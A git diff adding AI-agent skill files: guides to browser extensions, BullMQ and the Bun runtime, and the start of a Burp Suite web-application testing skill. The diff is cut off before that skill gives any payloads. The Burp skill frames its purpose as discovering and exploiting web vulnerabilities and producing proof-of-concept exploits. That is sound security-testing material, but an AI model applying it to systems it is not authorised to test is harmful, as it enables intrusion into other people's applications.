| Issue | medium | # Wait for popup BEFORE triggering it: |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `agent-tool-builder`, `workflow-automation`, `computer-use-agents`, `test-architect`
|
||||
261
skills/browser-extension-builder/SKILL.md
Normal file
261
skills/browser-extension-builder/SKILL.md
Normal file
@@ -0,0 +1,261 @@
|
||||
---
|
||||
name: browser-extension-builder
|
||||
description: "Expert in building browser extensions that solve real problems - Chrome, Firefox, and cross-browser extensions. Covers extension architecture, manifest v3, content scripts, popup UIs, monetization strategies, and Chrome Web Store publishing. Use when: browser extension, chrome extension, firefox addon, extension, manifest v3."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Browser Extension Builder
|
||||
|
||||
**Role**: Browser Extension Architect
|
||||
|
||||
You extend the browser to give users superpowers. You understand the
|
||||
unique constraints of extension development - permissions, security,
|
||||
store policies. You build extensions that people install and actually
|
||||
use daily. You know the difference between a toy and a tool.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Extension architecture
|
||||
- Manifest v3 (MV3)
|
||||
- Content scripts
|
||||
- Background workers
|
||||
- Popup interfaces
|
||||
- Extension monetization
|
||||
- Chrome Web Store publishing
|
||||
- Cross-browser support
|
||||
|
||||
## Patterns
|
||||
|
||||
### Extension Architecture
|
||||
|
||||
Structure for modern browser extensions
|
||||
|
||||
**When to use**: When starting a new extension
|
||||
|
||||
```javascript
|
||||
## Extension Architecture
|
||||
|
||||
### Project Structure
|
||||
```
|
||||
extension/
|
||||
├── manifest.json # Extension config
|
||||
├── popup/
|
||||
│ ├── popup.html # Popup UI
|
||||
│ ├── popup.css
|
||||
│ └── popup.js
|
||||
├── content/
|
||||
│ └── content.js # Runs on web pages
|
||||
├── background/
|
||||
│ └── service-worker.js # Background logic
|
||||
├── options/
|
||||
│ ├── options.html # Settings page
|
||||
│ └── options.js
|
||||
└── icons/
|
||||
├── icon16.png
|
||||
├── icon48.png
|
||||
└── icon128.png
|
||||
```
|
||||
|
||||
### Manifest V3 Template
|
||||
```json
|
||||
{
|
||||
"manifest_version": 3,
|
||||
"name": "My Extension",
|
||||
"version": "1.0.0",
|
||||
"description": "What it does",
|
||||
"permissions": ["storage", "activeTab"],
|
||||
"action": {
|
||||
"default_popup": "popup/popup.html",
|
||||
"default_icon": {
|
||||
"16": "icons/icon16.png",
|
||||
"48": "icons/icon48.png",
|
||||
"128": "icons/icon128.png"
|
||||
}
|
||||
},
|
||||
"content_scripts": [{
|
||||
"matches": ["<all_urls>"],
|
||||
"js": ["content/content.js"]
|
||||
}],
|
||||
"background": {
|
||||
"service_worker": "background/service-worker.js"
|
||||
},
|
||||
"options_page": "options/options.html"
|
||||
}
|
||||
```
|
||||
|
||||
### Communication Pattern
|
||||
```
|
||||
Popup ←→ Background (Service Worker) ←→ Content Script
|
||||
↓
|
||||
chrome.storage
|
||||
```
|
||||
```
|
||||
|
||||
### Content Scripts
|
||||
|
||||
Code that runs on web pages
|
||||
|
||||
**When to use**: When modifying or reading page content
|
||||
|
||||
```javascript
|
||||
## Content Scripts
|
||||
|
||||
### Basic Content Script
|
||||
```javascript
|
||||
// content.js - Runs on every matched page
|
||||
|
||||
// Wait for page to load
|
||||
document.addEventListener('DOMContentLoaded', () => {
|
||||
// Modify the page
|
||||
const element = document.querySelector('.target');
|
||||
if (element) {
|
||||
element.style.backgroundColor = 'yellow';
|
||||
}
|
||||
});
|
||||
|
||||
// Listen for messages from popup/background
|
||||
chrome.runtime.onMessage.addListener((message, sender, sendResponse) => {
|
||||
if (message.action === 'getData') {
|
||||
const data = document.querySelector('.data')?.textContent;
|
||||
sendResponse({ data });
|
||||
}
|
||||
return true; // Keep channel open for async
|
||||
});
|
||||
```
|
||||
|
||||
### Injecting UI
|
||||
```javascript
|
||||
// Create floating UI on page
|
||||
function injectUI() {
|
||||
const container = document.createElement('div');
|
||||
container.id = 'my-extension-ui';
|
||||
container.innerHTML = `
|
||||
<div style="position: fixed; bottom: 20px; right: 20px;
|
||||
background: white; padding: 16px; border-radius: 8px;
|
||||
box-shadow: 0 4px 12px rgba(0,0,0,0.15); z-index: 10000;">
|
||||
<h3>My Extension</h3>
|
||||
<button id="my-extension-btn">Click me</button>
|
||||
</div>
|
||||
`;
|
||||
document.body.appendChild(container);
|
||||
|
||||
document.getElementById('my-extension-btn').addEventListener('click', () => {
|
||||
// Handle click
|
||||
});
|
||||
}
|
||||
|
||||
injectUI();
|
||||
```
|
||||
|
||||
### Permissions for Content Scripts
|
||||
```json
|
||||
{
|
||||
"content_scripts": [{
|
||||
"matches": ["https://specific-site.com/*"],
|
||||
"js": ["content.js"],
|
||||
"run_at": "document_end"
|
||||
}]
|
||||
}
|
||||
```
|
||||
```
|
||||
|
||||
### Storage and State
|
||||
|
||||
Persisting extension data
|
||||
|
||||
**When to use**: When saving user settings or data
|
||||
|
||||
```javascript
|
||||
## Storage and State
|
||||
|
||||
### Chrome Storage API
|
||||
```javascript
|
||||
// Save data
|
||||
chrome.storage.local.set({ key: 'value' }, () => {
|
||||
console.log('Saved');
|
||||
});
|
||||
|
||||
// Get data
|
||||
chrome.storage.local.get(['key'], (result) => {
|
||||
console.log(result.key);
|
||||
});
|
||||
|
||||
// Sync storage (syncs across devices)
|
||||
chrome.storage.sync.set({ setting: true });
|
||||
|
||||
// Watch for changes
|
||||
chrome.storage.onChanged.addListener((changes, area) => {
|
||||
if (changes.key) {
|
||||
console.log('key changed:', changes.key.newValue);
|
||||
}
|
||||
});
|
||||
```
|
||||
|
||||
### Storage Limits
|
||||
| Type | Limit |
|
||||
|------|-------|
|
||||
| local | 5MB |
|
||||
| sync | 100KB total, 8KB per item |
|
||||
|
||||
### Async/Await Pattern
|
||||
```javascript
|
||||
// Modern async wrapper
|
||||
async function getStorage(keys) {
|
||||
return new Promise((resolve) => {
|
||||
chrome.storage.local.get(keys, resolve);
|
||||
});
|
||||
}
|
||||
|
||||
async function setStorage(data) {
|
||||
return new Promise((resolve) => {
|
||||
chrome.storage.local.set(data, resolve);
|
||||
});
|
||||
}
|
||||
|
||||
// Usage
|
||||
const { settings } = await getStorage(['settings']);
|
||||
await setStorage({ settings: { ...settings, theme: 'dark' } });
|
||||
```
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Requesting All Permissions
|
||||
|
||||
**Why bad**: Users won't install.
|
||||
Store may reject.
|
||||
Security risk.
|
||||
Bad reviews.
|
||||
|
||||
**Instead**: Request minimum needed.
|
||||
Use optional permissions.
|
||||
Explain why in description.
|
||||
Request at time of use.
|
||||
|
||||
### ❌ Heavy Background Processing
|
||||
|
||||
**Why bad**: MV3 terminates idle workers.
|
||||
Battery drain.
|
||||
Browser slows down.
|
||||
Users uninstall.
|
||||
|
||||
**Instead**: Keep background minimal.
|
||||
Use alarms for periodic tasks.
|
||||
Offload to content scripts.
|
||||
Cache aggressively.
|
||||
|
||||
### ❌ Breaking on Updates
|
||||
|
||||
**Why bad**: Selectors change.
|
||||
APIs change.
|
||||
Angry users.
|
||||
Bad reviews.
|
||||
|
||||
**Instead**: Use stable selectors.
|
||||
Add error handling.
|
||||
Monitor for breakage.
|
||||
Update quickly when broken.
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `frontend`, `micro-saas-launcher`, `personal-tool-builder`
|
||||
57
skills/bullmq-specialist/SKILL.md
Normal file
57
skills/bullmq-specialist/SKILL.md
Normal file
@@ -0,0 +1,57 @@
|
||||
---
|
||||
name: bullmq-specialist
|
||||
description: "BullMQ expert for Redis-backed job queues, background processing, and reliable async execution in Node.js/TypeScript applications. Use when: bullmq, bull queue, redis queue, background job, job queue."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# BullMQ Specialist
|
||||
|
||||
You are a BullMQ expert who has processed billions of jobs in production.
|
||||
You understand that queues are the backbone of scalable applications - they
|
||||
decouple services, smooth traffic spikes, and enable reliable async processing.
|
||||
|
||||
You've debugged stuck jobs at 3am, optimized worker concurrency for maximum
|
||||
throughput, and designed job flows that handle complex multi-step processes.
|
||||
You know that most queue problems are actually Redis problems or application
|
||||
design problems.
|
||||
|
||||
Your core philosophy:
|
||||
|
||||
## Capabilities
|
||||
|
||||
- bullmq-queues
|
||||
- job-scheduling
|
||||
- delayed-jobs
|
||||
- repeatable-jobs
|
||||
- job-priorities
|
||||
- rate-limiting-jobs
|
||||
- job-events
|
||||
- worker-patterns
|
||||
- flow-producers
|
||||
- job-dependencies
|
||||
|
||||
## Patterns
|
||||
|
||||
### Basic Queue Setup
|
||||
|
||||
Production-ready BullMQ queue with proper configuration
|
||||
|
||||
### Delayed and Scheduled Jobs
|
||||
|
||||
Jobs that run at specific times or after delays
|
||||
|
||||
### Job Flows and Dependencies
|
||||
|
||||
Complex multi-step job processing with parent-child relationships
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Giant Job Payloads
|
||||
|
||||
### ❌ No Dead Letter Queue
|
||||
|
||||
### ❌ Infinite Concurrency
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `redis-specialist`, `backend`, `nextjs-app-router`, `email-systems`, `ai-workflow-automation`, `performance-hunter`
|
||||
691
skills/bun-development/SKILL.md
Normal file
691
skills/bun-development/SKILL.md
Normal file
@@ -0,0 +1,691 @@
|
||||
---
|
||||
name: bun-development
|
||||
description: "Modern JavaScript/TypeScript development with Bun runtime. Covers package management, bundling, testing, and migration from Node.js. Use when working with Bun, optimizing JS/TS development speed, or migrating from Node.js to Bun."
|
||||
---
|
||||
|
||||
# ⚡ Bun Development
|
||||
|
||||
> Fast, modern JavaScript/TypeScript development with the Bun runtime, inspired by [oven-sh/bun](https://github.com/oven-sh/bun).
|
||||
|
||||
## When to Use This Skill
|
||||
|
||||
Use this skill when:
|
||||
|
||||
- Starting new JS/TS projects with Bun
|
||||
- Migrating from Node.js to Bun
|
||||
- Optimizing development speed
|
||||
- Using Bun's built-in tools (bundler, test runner)
|
||||
- Troubleshooting Bun-specific issues
|
||||
|
||||
---
|
||||
|
||||
## 1. Getting Started
|
||||
|
||||
### 1.1 Installation
|
||||
|
||||
```bash
|
||||
# macOS / Linux
|
||||
curl -fsSL https://bun.sh/install | bash
|
||||
|
||||
# Windows
|
||||
powershell -c "irm bun.sh/install.ps1 | iex"
|
||||
|
||||
# Homebrew
|
||||
brew tap oven-sh/bun
|
||||
brew install bun
|
||||
|
||||
# npm (if needed)
|
||||
npm install -g bun
|
||||
|
||||
# Upgrade
|
||||
bun upgrade
|
||||
```
|
||||
|
||||
### 1.2 Why Bun?
|
||||
|
||||
| Feature | Bun | Node.js |
|
||||
| :-------------- | :------------- | :-------------------------- |
|
||||
| Startup time | ~25ms | ~100ms+ |
|
||||
| Package install | 10-100x faster | Baseline |
|
||||
| TypeScript | Native | Requires transpiler |
|
||||
| JSX | Native | Requires transpiler |
|
||||
| Test runner | Built-in | External (Jest, Vitest) |
|
||||
| Bundler | Built-in | External (Webpack, esbuild) |
|
||||
|
||||
---
|
||||
|
||||
## 2. Project Setup
|
||||
|
||||
### 2.1 Create New Project
|
||||
|
||||
```bash
|
||||
# Initialize project
|
||||
bun init
|
||||
|
||||
# Creates:
|
||||
# ├── package.json
|
||||
# ├── tsconfig.json
|
||||
# ├── index.ts
|
||||
# └── README.md
|
||||
|
||||
# With specific template
|
||||
bun create <template> <project-name>
|
||||
|
||||
# Examples
|
||||
bun create react my-app # React app
|
||||
bun create next my-app # Next.js app
|
||||
bun create vite my-app # Vite app
|
||||
bun create elysia my-api # Elysia API
|
||||
```
|
||||
|
||||
### 2.2 package.json
|
||||
|
||||
```json
|
||||
{
|
||||
"name": "my-bun-project",
|
||||
"version": "1.0.0",
|
||||
"module": "index.ts",
|
||||
"type": "module",
|
||||
"scripts": {
|
||||
"dev": "bun run --watch index.ts",
|
||||
"start": "bun run index.ts",
|
||||
"test": "bun test",
|
||||
"build": "bun build ./index.ts --outdir ./dist",
|
||||
"lint": "bunx eslint ."
|
||||
},
|
||||
"devDependencies": {
|
||||
"@types/bun": "latest"
|
||||
},
|
||||
"peerDependencies": {
|
||||
"typescript": "^5.0.0"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### 2.3 tsconfig.json (Bun-optimized)
|
||||
|
||||
```json
|
||||
{
|
||||
"compilerOptions": {
|
||||
"lib": ["ESNext"],
|
||||
"module": "esnext",
|
||||
"target": "esnext",
|
||||
"moduleResolution": "bundler",
|
||||
"moduleDetection": "force",
|
||||
"allowImportingTsExtensions": true,
|
||||
"noEmit": true,
|
||||
"composite": true,
|
||||
"strict": true,
|
||||
"downlevelIteration": true,
|
||||
"skipLibCheck": true,
|
||||
"jsx": "react-jsx",
|
||||
"allowSyntheticDefaultImports": true,
|
||||
"forceConsistentCasingInFileNames": true,
|
||||
"allowJs": true,
|
||||
"types": ["bun-types"]
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 3. Package Management
|
||||
|
||||
### 3.1 Installing Packages
|
||||
|
||||
```bash
|
||||
# Install from package.json
|
||||
bun install # or 'bun i'
|
||||
|
||||
# Add dependencies
|
||||
bun add express # Regular dependency
|
||||
bun add -d typescript # Dev dependency
|
||||
bun add -D @types/node # Dev dependency (alias)
|
||||
bun add --optional pkg # Optional dependency
|
||||
|
||||
# From specific registry
|
||||
bun add lodash --registry https://registry.npmmirror.com
|
||||
|
||||
# Install specific version
|
||||
bun add react@18.2.0
|
||||
bun add react@latest
|
||||
bun add react@next
|
||||
|
||||
# From git
|
||||
bun add github:user/repo
|
||||
bun add git+https://github.com/user/repo.git
|
||||
```
|
||||
|
||||
### 3.2 Removing & Updating
|
||||
|
||||
```bash
|
||||
# Remove package
|
||||
bun remove lodash
|
||||
|
||||
# Update packages
|
||||
bun update # Update all
|
||||
bun update lodash # Update specific
|
||||
bun update --latest # Update to latest (ignore ranges)
|
||||
|
||||
# Check outdated
|
||||
bun outdated
|
||||
```
|
||||
|
||||
### 3.3 bunx (npx equivalent)
|
||||
|
||||
```bash
|
||||
# Execute package binaries
|
||||
bunx prettier --write .
|
||||
bunx tsc --init
|
||||
bunx create-react-app my-app
|
||||
|
||||
# With specific version
|
||||
bunx -p typescript@4.9 tsc --version
|
||||
|
||||
# Run without installing
|
||||
bunx cowsay "Hello from Bun!"
|
||||
```
|
||||
|
||||
### 3.4 Lockfile
|
||||
|
||||
```bash
|
||||
# bun.lockb is a binary lockfile (faster parsing)
|
||||
# To generate text lockfile for debugging:
|
||||
bun install --yarn # Creates yarn.lock
|
||||
|
||||
# Trust existing lockfile
|
||||
bun install --frozen-lockfile
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 4. Running Code
|
||||
|
||||
### 4.1 Basic Execution
|
||||
|
||||
```bash
|
||||
# Run TypeScript directly (no build step!)
|
||||
bun run index.ts
|
||||
|
||||
# Run JavaScript
|
||||
bun run index.js
|
||||
|
||||
# Run with arguments
|
||||
bun run server.ts --port 3000
|
||||
|
||||
# Run package.json script
|
||||
bun run dev
|
||||
bun run build
|
||||
|
||||
# Short form (for scripts)
|
||||
bun dev
|
||||
bun build
|
||||
```
|
||||
|
||||
### 4.2 Watch Mode
|
||||
|
||||
```bash
|
||||
# Auto-restart on file changes
|
||||
bun --watch run index.ts
|
||||
|
||||
# With hot reloading
|
||||
bun --hot run server.ts
|
||||
```
|
||||
|
||||
### 4.3 Environment Variables
|
||||
|
||||
```typescript
|
||||
// .env file is loaded automatically!
|
||||
|
||||
// Access environment variables
|
||||
const apiKey = Bun.env.API_KEY;
|
||||
const port = Bun.env.PORT ?? "3000";
|
||||
|
||||
// Or use process.env (Node.js compatible)
|
||||
const dbUrl = process.env.DATABASE_URL;
|
||||
```
|
||||
|
||||
```bash
|
||||
# Run with specific env file
|
||||
bun --env-file=.env.production run index.ts
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 5. Built-in APIs
|
||||
|
||||
### 5.1 File System (Bun.file)
|
||||
|
||||
```typescript
|
||||
// Read file
|
||||
const file = Bun.file("./data.json");
|
||||
const text = await file.text();
|
||||
const json = await file.json();
|
||||
const buffer = await file.arrayBuffer();
|
||||
|
||||
// File info
|
||||
console.log(file.size); // bytes
|
||||
console.log(file.type); // MIME type
|
||||
|
||||
// Write file
|
||||
await Bun.write("./output.txt", "Hello, Bun!");
|
||||
await Bun.write("./data.json", JSON.stringify({ foo: "bar" }));
|
||||
|
||||
// Stream large files
|
||||
const reader = file.stream();
|
||||
for await (const chunk of reader) {
|
||||
console.log(chunk);
|
||||
}
|
||||
```
|
||||
|
||||
### 5.2 HTTP Server (Bun.serve)
|
||||
|
||||
```typescript
|
||||
const server = Bun.serve({
|
||||
port: 3000,
|
||||
|
||||
fetch(request) {
|
||||
const url = new URL(request.url);
|
||||
|
||||
if (url.pathname === "/") {
|
||||
return new Response("Hello World!");
|
||||
}
|
||||
|
||||
if (url.pathname === "/api/users") {
|
||||
return Response.json([
|
||||
{ id: 1, name: "Alice" },
|
||||
{ id: 2, name: "Bob" },
|
||||
]);
|
||||
}
|
||||
|
||||
return new Response("Not Found", { status: 404 });
|
||||
},
|
||||
|
||||
error(error) {
|
||||
return new Response(`Error: ${error.message}`, { status: 500 });
|
||||
},
|
||||
});
|
||||
|
||||
console.log(`Server running at http://localhost:${server.port}`);
|
||||
```
|
||||
|
||||
### 5.3 WebSocket Server
|
||||
|
||||
```typescript
|
||||
const server = Bun.serve({
|
||||
port: 3000,
|
||||
|
||||
fetch(req, server) {
|
||||
// Upgrade to WebSocket
|
||||
if (server.upgrade(req)) {
|
||||
return; // Upgraded
|
||||
}
|
||||
return new Response("Upgrade failed", { status: 500 });
|
||||
},
|
||||
|
||||
websocket: {
|
||||
open(ws) {
|
||||
console.log("Client connected");
|
||||
ws.send("Welcome!");
|
||||
},
|
||||
|
||||
message(ws, message) {
|
||||
console.log(`Received: ${message}`);
|
||||
ws.send(`Echo: ${message}`);
|
||||
},
|
||||
|
||||
close(ws) {
|
||||
console.log("Client disconnected");
|
||||
},
|
||||
},
|
||||
});
|
||||
```
|
||||
|
||||
### 5.4 SQLite (Bun.sql)
|
||||
|
||||
```typescript
|
||||
import { Database } from "bun:sqlite";
|
||||
|
||||
const db = new Database("mydb.sqlite");
|
||||
|
||||
// Create table
|
||||
db.run(`
|
||||
CREATE TABLE IF NOT EXISTS users (
|
||||
id INTEGER PRIMARY KEY AUTOINCREMENT,
|
||||
name TEXT NOT NULL,
|
||||
email TEXT UNIQUE
|
||||
)
|
||||
`);
|
||||
|
||||
// Insert
|
||||
const insert = db.prepare("INSERT INTO users (name, email) VALUES (?, ?)");
|
||||
insert.run("Alice", "alice@example.com");
|
||||
|
||||
// Query
|
||||
const query = db.prepare("SELECT * FROM users WHERE name = ?");
|
||||
const user = query.get("Alice");
|
||||
console.log(user); // { id: 1, name: "Alice", email: "alice@example.com" }
|
||||
|
||||
// Query all
|
||||
const allUsers = db.query("SELECT * FROM users").all();
|
||||
```
|
||||
|
||||
### 5.5 Password Hashing
|
||||
|
||||
```typescript
|
||||
// Hash password
|
||||
const password = "super-secret";
|
||||
const hash = await Bun.password.hash(password);
|
||||
|
||||
// Verify password
|
||||
const isValid = await Bun.password.verify(password, hash);
|
||||
console.log(isValid); // true
|
||||
|
||||
// With algorithm options
|
||||
const bcryptHash = await Bun.password.hash(password, {
|
||||
algorithm: "bcrypt",
|
||||
cost: 12,
|
||||
});
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 6. Testing
|
||||
|
||||
### 6.1 Basic Tests
|
||||
|
||||
```typescript
|
||||
// math.test.ts
|
||||
import { describe, it, expect, beforeAll, afterAll } from "bun:test";
|
||||
|
||||
describe("Math operations", () => {
|
||||
it("adds two numbers", () => {
|
||||
expect(1 + 1).toBe(2);
|
||||
});
|
||||
|
||||
it("subtracts two numbers", () => {
|
||||
expect(5 - 3).toBe(2);
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### 6.2 Running Tests
|
||||
|
||||
```bash
|
||||
# Run all tests
|
||||
bun test
|
||||
|
||||
# Run specific file
|
||||
bun test math.test.ts
|
||||
|
||||
# Run matching pattern
|
||||
bun test --grep "adds"
|
||||
|
||||
# Watch mode
|
||||
bun test --watch
|
||||
|
||||
# With coverage
|
||||
bun test --coverage
|
||||
|
||||
# Timeout
|
||||
bun test --timeout 5000
|
||||
```
|
||||
|
||||
### 6.3 Matchers
|
||||
|
||||
```typescript
|
||||
import { expect, test } from "bun:test";
|
||||
|
||||
test("matchers", () => {
|
||||
// Equality
|
||||
expect(1).toBe(1);
|
||||
expect({ a: 1 }).toEqual({ a: 1 });
|
||||
expect([1, 2]).toContain(1);
|
||||
|
||||
// Comparisons
|
||||
expect(10).toBeGreaterThan(5);
|
||||
expect(5).toBeLessThanOrEqual(5);
|
||||
|
||||
// Truthiness
|
||||
expect(true).toBeTruthy();
|
||||
expect(null).toBeNull();
|
||||
expect(undefined).toBeUndefined();
|
||||
|
||||
// Strings
|
||||
expect("hello").toMatch(/ell/);
|
||||
expect("hello").toContain("ell");
|
||||
|
||||
// Arrays
|
||||
expect([1, 2, 3]).toHaveLength(3);
|
||||
|
||||
// Exceptions
|
||||
expect(() => {
|
||||
throw new Error("fail");
|
||||
}).toThrow("fail");
|
||||
|
||||
// Async
|
||||
await expect(Promise.resolve(1)).resolves.toBe(1);
|
||||
await expect(Promise.reject("err")).rejects.toBe("err");
|
||||
});
|
||||
```
|
||||
|
||||
### 6.4 Mocking
|
||||
|
||||
```typescript
|
||||
import { mock, spyOn } from "bun:test";
|
||||
|
||||
// Mock function
|
||||
const mockFn = mock((x: number) => x * 2);
|
||||
mockFn(5);
|
||||
expect(mockFn).toHaveBeenCalled();
|
||||
expect(mockFn).toHaveBeenCalledWith(5);
|
||||
expect(mockFn.mock.results[0].value).toBe(10);
|
||||
|
||||
// Spy on method
|
||||
const obj = {
|
||||
method: () => "original",
|
||||
};
|
||||
const spy = spyOn(obj, "method").mockReturnValue("mocked");
|
||||
expect(obj.method()).toBe("mocked");
|
||||
expect(spy).toHaveBeenCalled();
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 7. Bundling
|
||||
|
||||
### 7.1 Basic Build
|
||||
|
||||
```bash
|
||||
# Bundle for production
|
||||
bun build ./src/index.ts --outdir ./dist
|
||||
|
||||
# With options
|
||||
bun build ./src/index.ts \
|
||||
--outdir ./dist \
|
||||
--target browser \
|
||||
--minify \
|
||||
--sourcemap
|
||||
```
|
||||
|
||||
### 7.2 Build API
|
||||
|
||||
```typescript
|
||||
const result = await Bun.build({
|
||||
entrypoints: ["./src/index.ts"],
|
||||
outdir: "./dist",
|
||||
target: "browser", // or "bun", "node"
|
||||
minify: true,
|
||||
sourcemap: "external",
|
||||
splitting: true,
|
||||
format: "esm",
|
||||
|
||||
// External packages (not bundled)
|
||||
external: ["react", "react-dom"],
|
||||
|
||||
// Define globals
|
||||
define: {
|
||||
"process.env.NODE_ENV": JSON.stringify("production"),
|
||||
},
|
||||
|
||||
// Naming
|
||||
naming: {
|
||||
entry: "[name].[hash].js",
|
||||
chunk: "chunks/[name].[hash].js",
|
||||
asset: "assets/[name].[hash][ext]",
|
||||
},
|
||||
});
|
||||
|
||||
if (!result.success) {
|
||||
console.error(result.logs);
|
||||
}
|
||||
```
|
||||
|
||||
### 7.3 Compile to Executable
|
||||
|
||||
```bash
|
||||
# Create standalone executable
|
||||
bun build ./src/cli.ts --compile --outfile myapp
|
||||
|
||||
# Cross-compile
|
||||
bun build ./src/cli.ts --compile --target=bun-linux-x64 --outfile myapp-linux
|
||||
bun build ./src/cli.ts --compile --target=bun-darwin-arm64 --outfile myapp-mac
|
||||
|
||||
# With embedded assets
|
||||
bun build ./src/cli.ts --compile --outfile myapp --embed ./assets
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 8. Migration from Node.js
|
||||
|
||||
### 8.1 Compatibility
|
||||
|
||||
```typescript
|
||||
// Most Node.js APIs work out of the box
|
||||
import fs from "fs";
|
||||
import path from "path";
|
||||
import crypto from "crypto";
|
||||
|
||||
// process is global
|
||||
console.log(process.cwd());
|
||||
console.log(process.env.HOME);
|
||||
|
||||
// Buffer is global
|
||||
const buf = Buffer.from("hello");
|
||||
|
||||
// __dirname and __filename work
|
||||
console.log(__dirname);
|
||||
console.log(__filename);
|
||||
```
|
||||
|
||||
### 8.2 Common Migration Steps
|
||||
|
||||
```bash
|
||||
# 1. Install Bun
|
||||
curl -fsSL https://bun.sh/install | bash
|
||||
|
||||
# 2. Replace package manager
|
||||
rm -rf node_modules package-lock.json
|
||||
bun install
|
||||
|
||||
# 3. Update scripts in package.json
|
||||
# "start": "node index.js" → "start": "bun run index.ts"
|
||||
# "test": "jest" → "test": "bun test"
|
||||
|
||||
# 4. Add Bun types
|
||||
bun add -d @types/bun
|
||||
```
|
||||
|
||||
### 8.3 Differences from Node.js
|
||||
|
||||
```typescript
|
||||
// ❌ Node.js specific (may not work)
|
||||
require("module") // Use import instead
|
||||
require.resolve("pkg") // Use import.meta.resolve
|
||||
__non_webpack_require__ // Not supported
|
||||
|
||||
// ✅ Bun equivalents
|
||||
import pkg from "pkg";
|
||||
const resolved = import.meta.resolve("pkg");
|
||||
Bun.resolveSync("pkg", process.cwd());
|
||||
|
||||
// ❌ These globals differ
|
||||
process.hrtime() // Use Bun.nanoseconds()
|
||||
setImmediate() // Use queueMicrotask()
|
||||
|
||||
// ✅ Bun-specific features
|
||||
const file = Bun.file("./data.txt"); // Fast file API
|
||||
Bun.serve({ port: 3000, fetch: ... }); // Fast HTTP server
|
||||
Bun.password.hash(password); // Built-in hashing
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 9. Performance Tips
|
||||
|
||||
### 9.1 Use Bun-native APIs
|
||||
|
||||
```typescript
|
||||
// Slow (Node.js compat)
|
||||
import fs from "fs/promises";
|
||||
const content = await fs.readFile("./data.txt", "utf-8");
|
||||
|
||||
// Fast (Bun-native)
|
||||
const file = Bun.file("./data.txt");
|
||||
const content = await file.text();
|
||||
```
|
||||
|
||||
### 9.2 Use Bun.serve for HTTP
|
||||
|
||||
```typescript
|
||||
// Don't: Express/Fastify (overhead)
|
||||
import express from "express";
|
||||
const app = express();
|
||||
|
||||
// Do: Bun.serve (native, 4-10x faster)
|
||||
Bun.serve({
|
||||
fetch(req) {
|
||||
return new Response("Hello!");
|
||||
},
|
||||
});
|
||||
|
||||
// Or use Elysia (Bun-optimized framework)
|
||||
import { Elysia } from "elysia";
|
||||
new Elysia().get("/", () => "Hello!").listen(3000);
|
||||
```
|
||||
|
||||
### 9.3 Bundle for Production
|
||||
|
||||
```bash
|
||||
# Always bundle and minify for production
|
||||
bun build ./src/index.ts --outdir ./dist --minify --target node
|
||||
|
||||
# Then run the bundle
|
||||
bun run ./dist/index.js
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Quick Reference
|
||||
|
||||
| Task | Command |
|
||||
| :----------- | :----------------------------------------- |
|
||||
| Init project | `bun init` |
|
||||
| Install deps | `bun install` |
|
||||
| Add package | `bun add <pkg>` |
|
||||
| Run script | `bun run <script>` |
|
||||
| Run file | `bun run file.ts` |
|
||||
| Watch mode | `bun --watch run file.ts` |
|
||||
| Run tests | `bun test` |
|
||||
| Build | `bun build ./src/index.ts --outdir ./dist` |
|
||||
| Execute pkg | `bunx <pkg>` |
|
||||
|
||||
---
|
||||
|
||||
## Resources
|
||||
|
||||
- [Bun Documentation](https://bun.sh/docs)
|
||||
- [Bun GitHub](https://github.com/oven-sh/bun)
|
||||
- [Elysia Framework](https://elysiajs.com/)
|
||||
- [Bun Discord](https://bun.sh/discord)
|
||||
377
skills/burp-suite-testing/SKILL.md
Normal file
377
skills/burp-suite-testing/SKILL.md
Normal file
@@ -0,0 +1,377 @@
|
||||
---
|
||||
name: Burp Suite Web Application Testing
|
||||
description: This skill should be used when the user asks to "intercept HTTP traffic", "modify web requests", "use Burp Suite for testing", "perform web vulnerability scanning", "test with Burp Repeater", "analyze HTTP history", or "configure proxy for web testing". It provides comprehensive guidance for using Burp Suite's core features for web application security testing.
|
||||
---
|
||||
|
||||
# Burp Suite Web Application Testing
|
||||
|
||||
## Purpose
|
||||
|
||||
Execute comprehensive web application security testing using Burp Suite's integrated toolset, including HTTP traffic interception and modification, request analysis and replay, automated vulnerability scanning, and manual testing workflows. This skill enables systematic discovery and exploitation of web application vulnerabilities through proxy-based testing methodology.
|
||||
|
||||
## Inputs / Prerequisites
|
||||
|
||||
### Required Tools
|
||||
- Burp Suite Community or Professional Edition installed
|
||||
- Burp's embedded browser or configured external browser
|
||||
- Target web application URL
|
||||
- Valid credentials for authenticated testing (if applicable)
|
||||
|
||||
### Environment Setup
|
||||
- Burp Suite launched with temporary or named project
|
||||
- Proxy listener active on 127.0.0.1:8080 (default)
|
||||
- Browser configured to use Burp proxy (or use Burp's browser)
|
||||
- CA certificate installed for HTTPS interception
|
||||
|
||||
### Editions Comparison
|
||||
| Feature | Community | Professional |
|
||||
|---------|-----------|--------------|
|
||||
| Proxy | ✓ | ✓ |
|
||||
| Repeater | ✓ | ✓ |
|
||||
| Intruder | Limited | Full |
|
||||
| Scanner | ✗ | ✓ |
|
||||
| Extensions | ✓ | ✓ |
|
||||
|
||||
## Outputs / Deliverables
|
||||
|
||||
### Primary Outputs
|
||||
- Intercepted and modified HTTP requests/responses
|
||||
- Vulnerability scan reports with remediation advice
|
||||
- HTTP history and site map documentation
|
||||
- Proof-of-concept exploits for identified vulnerabilities
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### Phase 1: Intercepting HTTP Traffic
|
||||
|
||||
#### Launch Burp's Browser
|
||||
Navigate to integrated browser for seamless proxy integration:
|
||||
|
||||
